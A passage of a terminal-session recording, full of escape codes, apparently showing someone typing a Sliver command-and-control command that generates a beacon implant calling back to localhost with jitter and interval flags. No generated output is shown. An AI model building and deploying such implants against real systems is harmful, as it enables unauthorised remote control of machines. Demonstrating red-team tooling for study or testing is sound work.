"\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[22D\u001b[9C\u001b[107D\u001b[22C\u001b[?25h"] +[5.684935, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.701874, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeaco\u001b[0m\u001b[0K\u001b[49m\r"] +[5.703438, "o", "\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[23D\u001b[9C\u001b[107D\u001b[23C\u001b[?25h"] +[5.713547, "o", "\u001b[?25l"] +[5.714074, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.718082, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[5.718541, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[24D\u001b[9C\u001b[107D\u001b[24C\u001b[?25h"] +[5.888006, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[5.900577, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A"] +[5.901326, "o", "\u001b[25D\u001b[9C\u001b[107D\u001b[25C\u001b[?25h"] +[6.09825, "o", "\u001b[?25l"] +[6.10032, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.117058, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[6.119032, "o", "\u001b[107D\u001b[1A\u001b[26D\u001b[9C\u001b[107D\u001b[26C\u001b[?25h"] +[6.318356, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.325885, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[27D\u001b[9C\u001b[107D\u001b[27C\u001b[?25h"] +[6.435974, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.449338, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[6.451031, "o", "\u001b[107D\u001b[1A\u001b[28D\u001b[9C\u001b[107D\u001b[28C\u001b[?25h"] +[6.545817, "o", "\u001b[?25l\u001b[107D"] +[6.548899, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.553581, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22ml\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[29D\u001b[9C\u001b[107D\u001b[29C\u001b[?25h"] +[6.707944, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.725087, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlo\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[6.725431, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[30D\u001b[9C\u001b[107D\u001b[30C\u001b[?25h"] +[6.800339, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.80793, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mloc\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[31D\u001b[9C\u001b[107D\u001b[31C\u001b[?25h"] +[6.873036, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.880291, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mloca\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[32D\u001b[9C\u001b[107D\u001b[32C\u001b[?25h"] +[6.914397, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[6.9203, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocal\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[6.920508, "o", "\u001b[1A\u001b[33D\u001b[9C\u001b[107D\u001b[33C\u001b[?25h"] +[7.057965, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[7.058914, "o", "\u001b[6n"] +[7.07196, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalh\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[34D\u001b[9C\u001b[107D\u001b[34C\u001b[?25h"] +[7.121583, "o", "\u001b[?25l\u001b[107D"] +[7.124019, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.127161, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalho\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[7.127736, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[35D\u001b[9C\u001b[107D\u001b[35C\u001b[?25h"] +[7.155871, "o", "\u001b[?25l\u001b[107D"] +[7.156541, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.158839, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhos\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[36D\u001b[9C\u001b[107D\u001b[36C"] +[7.159281, "o", "\u001b[?25h"] +[7.249506, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.255894, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[7.256084, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[37D\u001b[9C\u001b[107D\u001b[37C\u001b[?25h"] +[7.319518, "o", "\u001b[?25l"] +[7.321996, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[7.326926, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[38D\u001b[9C\u001b[107D\u001b[38C"] +[7.327526, "o", "\u001b[?25h"] +[8.244613, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.259371, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[8.261152, "o", "\u001b[107D\u001b[1A\u001b[39D\u001b[9C\u001b[107D\u001b[39C\u001b[?25h"] +[8.373314, "o", "\u001b[?25l"] +[8.381984, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.386997, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[8.387176, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[40D\u001b[9C\u001b[107D\u001b[40C\u001b[?25h"] +[8.54582, "o", "\u001b[?25l\u001b[107D"] +[8.546314, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.551965, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--s\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[8.553877, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[41D\u001b[9C\u001b[107D\u001b[41C\u001b[?25h"] +[8.659966, "o", "\u001b[?25l"] +[8.664278, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.668403, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--sk\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[8.669495, "o", "\u001b[107D\u001b[1A\u001b[42D\u001b[9C\u001b[107D\u001b[42C\u001b[?25h"] +[8.774433, "o", "\u001b[?25l"] +[8.776254, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.782822, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--ski\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[43D\u001b[9C\u001b[107D\u001b[43C\u001b[?25h"] +[8.861897, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[8.869467, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[44D\u001b[9C\u001b[107D\u001b[44C\u001b[?25h"] +[9.209609, "o", "\u001b[?25l"] +[9.211815, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.218382, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[45D\u001b[9C\u001b[107D\u001b[45C\u001b[?25h"] +[9.369014, "o", "\u001b[?25l"] +[9.370477, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.383545, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-s\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[46D\u001b[9C\u001b[107D\u001b[46C\u001b[?25h"] +[9.538155, "o", "\u001b[?25l"] +[9.539319, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.542469, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-sy\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K"] +[9.543267, "o", "\u001b[0J\u001b[107D\u001b[1A\u001b[47D\u001b[9C\u001b[107D\u001b[47C\u001b[?25h"] +[9.941324, "o", "\u001b[?25l"] +[9.956412, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[9.961491, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-sym\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[9.96293, "o", "\u001b[1A\u001b[48D\u001b[9C\u001b[107D\u001b[48C\u001b[?25h"] +[10.166048, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.175508, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symb\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.177995, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[49D\u001b[9C\u001b[107D\u001b[49C\u001b[?25h"] +[10.253067, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.25789, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbo\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[50D\u001b[9C\u001b[107D"] +[10.258848, "o", "\u001b[50C\u001b[?25h"] +[10.313217, "o", "\u001b[1 q"] +[10.34198, "o", "\u001b[1 q"] +[10.342195, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.344477, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.344758, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[53D\u001b[9C\u001b[107D\u001b[53C\u001b[?25h"] +[10.88006, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[10.888613, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[10.890304, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[54D\u001b[9C\u001b[107D\u001b[54C\u001b[?25h"] +[11.002112, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.014464, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.015491, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[55D\u001b[9C\u001b[107D\u001b[55C\u001b[?25h"] +[11.283116, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.299121, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--d\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[11.300946, "o", "\u001b[107D\u001b[1A\u001b[56D\u001b[9C\u001b[107D\u001b[56C\u001b[?25h"] +[11.336739, "o", "\u001b[?25l\u001b[107D"] +[11.338443, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.344194, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--de\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[57D\u001b[9C"] +[11.344355, "o", "\u001b[107D\u001b[57C\u001b[?25h"] +[11.357833, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[11.358428, "o", "\u001b[6n"] +[11.361392, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--deb\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[58D\u001b[9C\u001b[107D\u001b[58C\u001b[?25h"] +[11.405303, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[11.405633, "o", "\u001b[6n"] +[11.407984, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debu\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.408951, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[59D\u001b[9C\u001b[107D\u001b[59C\u001b[?25h"] +[11.591917, "o", "\u001b[?25l"] +[11.597606, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[11.604722, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[11.605927, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[60D\u001b[9C\u001b[107D\u001b[60C\u001b[?25h"] +[11.704325, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[11.712392, "o", "\u001b[6n"] +[11.716215, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[11.716363, "o", "\u001b[107D\u001b[1A\u001b[61D\u001b[9C\u001b[107D\u001b[61C\u001b[?25h"] +[12.326269, "o", "\u001b[?25l"] +[12.328608, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[12.334497, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[12.336471, "o", "\u001b[1A\u001b[62D\u001b[9C\u001b[107D\u001b[62C\u001b[?25h"] +[12.619637, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[12.628956, "o", "\u001b[6n"] +[12.634937, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[63D\u001b[9C\u001b[107D\u001b[63C\u001b[?25h"] +[13.029882, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[13.031634, "o", "\u001b[6n"] +[13.036477, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J"] +[13.036757, "o", "\u001b[107D\u001b[1A\u001b[64D\u001b[9C\u001b[107D\u001b[64C\u001b[?25h"] +[13.308092, "o", "\u001b[?25l"] +[13.312959, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[13.318384, "o", "\u001b[6n"] +[13.32643, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[65D\u001b[9C\u001b[107D\u001b[65C\u001b[?25h"] +[13.810937, "o", "\u001b[?25l\u001b[107D"] +[13.81462, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[13.824223, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[13.825588, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[66D\u001b[9C\u001b[107D\u001b[66C\u001b[?25h"] +[14.693013, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[14.700287, "o", "\u001b[6n"] +[14.706924, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[67D\u001b[9C\u001b[107D\u001b[67C\u001b[?25h"] +[15.237577, "o", "\u001b[?25l\u001b[107D"] +[15.241053, "o", "\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[15.247009, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D"] +[15.249159, "o", "\u001b[1A\u001b[68D\u001b[9C\u001b[107D\u001b[68C\u001b[?25h"] +[15.479446, "o", "\u001b[1 q"] +[15.506974, "o", "\u001b[1 q"] +[15.50792, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[15.509462, "o", "\u001b[6n"] +[15.513203, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S\u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[15.515282, "o", "\u001b[2mbeacon interval seconds\u001b[0m\u001b[0m\u001b[0K\r\r\n\u001b[0K\u001b[0m\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[1A\u001b[68D\u001b[9C\u001b[107D\u001b[68C\u001b[?25h"] +[17.033385, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[17.04594, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[69D\u001b[9C\u001b[107D\u001b[69C\u001b[?25h"] +[18.826391, "o", "\u001b[?25l\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[18.830292, "o", "\u001b[6n"] +[18.838831, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m1\u001b[0m\u001b[0K\u001b[49m\r\r\n\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[70D\u001b[9C\u001b[107D\u001b[70C\u001b[?25h"] +[19.106227, "o", "\u001b[?25l"] +[19.108266, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > \u001b[6n"] +[19.114835, "o", "\u001b[1m\u001b[32mgenerate \u001b[39m\u001b[22mbeacon \u001b[1m\u001b[38;05;244m-b \u001b[39m\u001b[22mlocalhost \u001b[1m\u001b[38;05;244m--skip-symbols \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m--debug \u001b[39m\u001b[22m\u001b[1m\u001b[38;05;244m-j \u001b[39m\u001b[22m5 \u001b[1m\u001b[38;05;244m-S \u001b[39m\u001b[22m15\u001b[0m\u001b[0K\u001b[49m\r\r\n"] +[19.115864, "o", "\u001b[0K\u001b[0J\u001b[107D\u001b[1A\u001b[71D\u001b[9C\u001b[107D\u001b[71C\u001b[?25h"] +[19.912306, "o", "\u001b[?25l"] +[19.918021, "o", "\u001b[107D\r\u001b[2K\u001b[4msliver\u001b[0m > "] +[19.920087, "o", "\u001b[6n"] +[19.93003, "o", "\u001b[1m\u001b[32mgenerate 